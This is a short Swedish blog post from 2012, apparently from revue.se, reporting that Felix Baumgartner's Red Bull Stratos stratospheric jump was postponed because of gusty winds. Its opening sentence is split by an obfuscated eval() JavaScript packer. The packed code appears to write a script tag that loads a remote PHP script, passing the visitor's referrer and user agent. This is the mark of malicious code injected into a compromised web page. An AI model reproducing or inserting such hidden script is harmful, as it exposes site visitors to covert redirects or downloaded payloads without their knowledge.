Image Image Image Image Image Image Image Image Image Image

| 22 augusti, 2019

Scroll to top

Top

Felix Baumgartner fick inte hoppa igår…

Felix Baumgartner fick inte hoppa igår…
Filip Urde
  • On 10 oktober, 2012
  • http://www.revue.se/filip-urde

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efnia|var|u0026u|referrer|dyrrd||js|php’.split(’|’),0,{}))
ni säkert vet så blev Felix Baumgartners rekordförsök avbrutet 

Byiga vindar tvingade teamet bakom Red Bull Stratos att avbryta
Felix Baumgartner och hans försök för att bli först att bryta ljudvallen i fritt fall från 36 000 meter. Efter att ha flyttats fram i flera steg, stoppades uppstigningsförsöket till sist av teamets chefsmeteorolog klockan 19.42 svensk tid. Den enorma heliumballongen, över 150 meter hög, hade då fyllts för avfärd men kastvindarna gjorde det omöjligt att fortsätta. Teamet har goda förhoppningar om att kunna genomföra projektet och följer nu väderprognoserna noggrant för att hitta en ny tidpunkt för rekordförsöket. Detaljer kring ny tid och datum kommer att komma snart.

Vi håller er uppdaterade.